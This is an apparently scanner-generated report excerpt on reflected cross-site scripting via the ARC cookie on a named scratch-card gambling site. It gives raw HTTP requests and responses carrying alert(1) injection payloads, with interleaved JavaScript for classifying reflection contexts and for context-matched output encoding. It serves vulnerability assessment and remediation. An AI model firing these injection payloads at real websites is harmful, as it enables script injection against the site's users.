3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a688'%3balert(1)//65d51956d09 was submitted in the ARC cookie. This input was echoed as 3a688';alert(1)//65d51956d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373a688'%3balert(1)//65d51956d09; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23468
Content-Type: text/html
Set-Cookie: ARC=1301373a688%27%3Balert%281%29%2F%2F65d51956d09; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301373a688';alert(1)//65d51956d09&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 907a6--><script>alert(1)</script>ceae361237d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137907a6--><script>alert(1)</script>ceae361237d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23516
Content-Type: text/html
Set-Cookie: ARC=130137907a6%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eceae361237d; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137907a6--><script>alert(1)</script>ceae361237d">
...[SNIP]...

3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload a689d--><script>alert(1)</script>693aad67342 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a689d--><script>alert(1)</script>693aad67342; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20640
Content-Type: text/html
Set-Cookie: ARC=130137a689d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E693aad67342; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137a689d--><script>alert(1)</script>693aad67342">
...[SNIP]...
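The context a scanner assigns to a reflection (HTML comment, quoted attribute, JavaScript string) can only be confirmed against the full response, not the excerpt. The following is an added example, not part of the scanner output or of the site's code: it locates every occurrence of a probe in an HTML body, classifies the context by scanning backwards for the enclosing script element, comment or tag, and reports whether the probe carries the delimiter needed to leave that context. The sample response is constructed for the example; the <!-- ... --> wrapper around the hidden input is an assumption about what surrounds the report's excerpt, and the host names are placeholders. Regex literals and CDATA are not modelled, so treat its verdict as a triage hint.

```javascript
// Added example, not part of the scanner report or the site's code.
// Locates each reflection of a probe in an HTML response and classifies the
// context it lands in, so a scanner's "HTML comment" / "JavaScript string"
// claim can be checked against the full body rather than a snippet.

// Probe copied from the report; the response around it is constructed here.
const PROBE = '130137a689d--><script>alert(1)</script>693aad67342';

// Constructed sample. The "<!-- ... -->" around the hidden input is an
// assumption about what surrounds the report's excerpt; host names are
// placeholders, not the real endpoints.
const SAMPLE_RESPONSE = [
  '<html><head><title>Prime Scratch Cards</title>',
  '<script type="text/javascript">',
  "  window.open('https://lobby.example/lobby.aspx?AR=" + PROBE + "&AFI=3','game');",
  '</script></head><body>',
  '<!-- legacy form, kept for reference',
  '<input type=hidden name ="AR" value ="' + PROBE + '">',
  '-->',
  "<img src='http://trk.example/?ac=99&AR=" + PROBE + "' border='0'>",
  '</body></html>',
].join('\n');

// Which string delimiter (if any) is still open at the end of a JS snippet.
// Handles backslash escapes and // and /* */ comments; regex literals are not
// modelled, so a quote inside a regex can mislead it.
function openQuote(code) {
  let quote = null;
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (quote) {
      if (c === '\\') i++;              // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '/' && code[i + 1] === '/') {
      const nl = code.indexOf('\n', i);
      i = nl === -1 ? code.length : nl; // loop increment moves past the newline
    } else if (c === '/' && code[i + 1] === '*') {
      const end = code.indexOf('*/', i + 2);
      i = end === -1 ? code.length : end + 1;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    }
  }
  return quote;
}

// Which attribute-value quote (if any) is open inside a start-tag prefix.
// Simplified: any quote toggles state; unquoted values containing quotes
// are not handled.
function attrQuote(tagPrefix) {
  let quote = null;
  for (const c of tagPrefix) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return quote;
}

// Classify the context at offset idx from what precedes it, which is also
// all the HTML parser has seen when it reaches the reflection.
function classifyContext(html, idx) {
  const lower = html.toLowerCase();
  const before = Math.max(idx - 1, 0);
  const scriptOpen = lower.lastIndexOf('<script', before);
  const scriptClose = lower.lastIndexOf('</script', before);
  if (scriptOpen !== -1 && scriptOpen > scriptClose) {
    const bodyStart = html.indexOf('>', scriptOpen) + 1;
    const q = openQuote(html.slice(bodyStart, idx));
    return q === "'" ? 'js-string-single'
         : q === '"' ? 'js-string-double'
         : q === '`' ? 'js-template'
         : 'js-code';
  }
  if (lower.lastIndexOf('<!--', before) > lower.lastIndexOf('-->', before)) {
    return 'html-comment';
  }
  if (lower.lastIndexOf('<', before) > lower.lastIndexOf('>', before)) {
    const q = attrQuote(html.slice(lower.lastIndexOf('<', before), idx));
    return q === '"' ? 'attr-double' : q === "'" ? 'attr-single' : 'tag';
  }
  return 'text';
}

// Does the probe carry the delimiter needed to leave the context it sits in?
// Leaving the context is the precondition; a working payload is a separate step.
// "</script" ends a script element regardless of JS quoting, which is why it
// counts for every script context.
const BREAKS_OUT = {
  'js-string-single': p => /<\/script/i.test(p) || /(^|[^\\])'/.test(p),
  'js-string-double': p => /<\/script/i.test(p) || /(^|[^\\])"/.test(p),
  'js-template':      p => /<\/script/i.test(p) || /(^|[^\\])`/.test(p) || p.includes('${'),
  'js-code':          () => true,
  'html-comment':     p => p.includes('-->') || p.includes('--!>'),
  'attr-double':      p => p.includes('"'),
  'attr-single':      p => p.includes("'"),
  'tag':              p => /[\s>]/.test(p),
  'text':             p => p.includes('<'),
};

function analyzeReflections(html, probe) {
  const results = [];
  for (let idx = html.indexOf(probe); idx !== -1; idx = html.indexOf(probe, idx + probe.length)) {
    const context = classifyContext(html, idx);
    results.push({ offset: idx, context, canBreakOut: BREAKS_OUT[context](probe) });
  }
  return results;
}

for (const r of analyzeReflections(SAMPLE_RESPONSE, PROBE)) {
  console.log(`offset ${r.offset}: ${r.context}, breaks out: ${r.canBreakOut}`);
}
```

Run against the constructed sample, the same probe is reported three times: inside a single-quoted JavaScript string (exploitable, because </script> ends the script element), inside the HTML comment (exploitable, because --> closes it) and inside a single-quoted img src attribute (inert, because the probe contains no single quote). Feed it the full body of a scanner response and the probe from the Issue detail to see which of the stated contexts actually hold.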

3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac357'%3balert(1)//6b580480cc3 was submitted in the ARC cookie. This input was echoed as ac357';alert(1)//6b580480cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
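The remediation advice for the script-context items above, and for the HTML-comment items such as the one preceding this finding, comes down to encoding for the exact context the value lands in, innermost first. The following is an added example, not code from the report or from the site: it rebuilds the two sinks the excerpts show (the single-quoted JavaScript string passed to window.open and the tracking-pixel attribute), plus a commented-out hidden field, first unsafely and then with context-matched encoders. The URL shapes are taken from the excerpts; the helper names are the example's own and the commented-out form is an assumed layout. Node.js, no dependencies.

```javascript
// Added example, not code from the report or from the site. Shows the sinks
// the ARC-cookie items describe (a JavaScript string literal, an HTML
// attribute and an HTML comment) built unsafely the way the excerpts show
// them, then with output encoding matched to each context.

// HTML attribute/text context: entity-encode everything that can end an
// attribute value or start a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// JavaScript string literal context. JSON.stringify escapes quotes,
// backslashes and control characters; the extra replacements keep
// "</script" and "<!--" from being seen by the HTML parser (which knows
// nothing about JavaScript quoting) and neutralise U+2028/2029.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// HTML comment context. Entities are not decoded inside comments, so the
// only goal is that "-->" or "--!>" can never be formed. The real fix is not
// to emit user data into comments at all; this is the fallback.
function commentSafe(s) {
  return String(s).replace(/-/g, '&#45;').replace(/>/g, '&gt;');
}

// Query-string value: percent-encode so the value cannot add parameters.
function lobbyUrl(ar) {
  return 'https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR='
    + encodeURIComponent(ar) + '&AFI=3';
}

// The sink as the report shows it: the cookie value is concatenated into a
// single-quoted JS string with no encoding at all.
function renderVulnerable(ar) {
  return "window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR="
    + ar + "&AFI=3','game');";
}

// Hardened: encode for the innermost context first (URL parameter), then
// for the enclosing one (JS string literal inside a <script> block).
function renderHardened(ar) {
  return 'window.open(' + jsStringLiteral(lobbyUrl(ar)) + ', "game");';
}

// The tracking pixel: the URL is built with encodeURIComponent, then the
// whole attribute value is entity-encoded for the single-quoted attribute.
function renderPixelHardened(ar) {
  const url = 'http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=' + encodeURIComponent(ar);
  return "<img src='" + escapeHtml(url) + "' border='0' width='1' height='1'>";
}

// A commented-out hidden field (assumed layout), with the value made unable
// to close the comment early.
function renderCommentHardened(ar) {
  return '<!-- <input type=hidden name="AR" value="' + commentSafe(ar) + '"> -->';
}

const payloads = ["ac357';alert(1)//6b580480cc3", 'a689d--><script>alert(1)</script>693aad67342'];
for (const p of payloads) {
  console.log(renderVulnerable(p));
  console.log(renderHardened(p));
  console.log(renderPixelHardened(p));
  console.log(renderCommentHardened(p));
}
```

The order matters: the value is first encoded for the URL it becomes part of, and the resulting URL is then encoded for the JavaScript literal (or attribute) that carries it. Reversing the order, or applying only the outer encoding, leaves either the query string or the enclosing context open to injection.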

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ac357'%3balert(1)//6b580480cc3; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20592
Content-Type: text/html
Set-Cookie: ARC=130137ac357%27%3Balert%281%29%2F%2F6b580480cc3; expires=Tue, 15-May-2012 12:35:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137ac357';alert(1)//6b580480cc3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c28"%3balert(1)//1755fc7fa81 was submitted in the ARC cookie. This input was echoed as c7c28";alert(1)//1755fc7fa81 in the application's response. The response excerpt below starts at an <img> tag whose attributes are single-quoted, where a double quote is inert; the enclosing script block and the opening double quote of the string the classification refers to lie outside the excerpt, so check the full response body before treating the finding as confirmed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c7c28"%3balert(1)//1755fc7fa81; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20592
Content-Type: text/html
Set-Cookie: ARC=130137c7c28%22%3Balert%281%29%2F%2F1755fc7fa81; expires=Tue, 15-May-2012 12:35:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137c7c28";alert(1)//1755fc7fa81' border='0' width='1' height='1'>
...[SNIP]...

3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload b1e50--><script>alert(1)</script>906211bf86e was submitted in the ARC cookie. This input was echoed unmodified in the application's response. As in the other comment-context items, the response excerpt below shows the reflection inside a double-quoted attribute value (value ="..."), where --> and <script> are inert; the opening <!-- the classification depends on lies outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b1e50--><script>alert(1)</script>906211bf86e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22019
Content-Type: text/html
Set-Cookie: ARC=130137b1e50%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E906211bf86e; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137b1e50--><script>alert(1)</script>906211bf86e">
...[SNIP]...

3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30874'%3b42237077da was submitted in the ARC cookie. This input was echoed as 30874';42237077da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response excerpt below also carries CUR=USD13cad";alert(1)//2102d64af9, a payload from a different probe that the server is still emitting in the same window.open call: some earlier input has evidently been retained across requests (most likely in the ASP session identified by the ASPSESSIONID cookie), which will have interfered with this test. Retry the proof-of-concept from a clean session, and treat the retained CUR value as a reflection to be checked in its own right.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013730874'%3b42237077da; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21990
Content-Type: text/html
Set-Cookie: ARC=13013730874%27%3B42237077da; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD13cad";alert(1)//2102d64af9&AR=13013730874';42237077da&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6a6"%3balert(1)//494849c4a21 was submitted in the ARC cookie. This input was echoed as ef6a6";alert(1)//494849c4a21 in the application's response. The response excerpt below starts at an <img> tag with single-quoted attributes, where a double quote is inert; the enclosing script block and the opening double quote of the string are outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ef6a6"%3balert(1)//494849c4a21; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22005
Content-Type: text/html
Set-Cookie: ARC=130137ef6a6%22%3Balert%281%29%2F%2F494849c4a21; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137ef6a6";alert(1)//494849c4a21' border='0' width='1' height='1'>
...[SNIP]...

3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 8654c--><script>alert(1)</script>38a0a9c6cd5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response. The response excerpt below shows the reflection inside a double-quoted attribute value (value ="..."), where --> and <script> are inert; the opening <!-- the classification depends on lies outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378654c--><script>alert(1)</script>38a0a9c6cd5; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23726
Content-Type: text/html
Set-Cookie: ARC=1301378654c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E38a0a9c6cd5; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

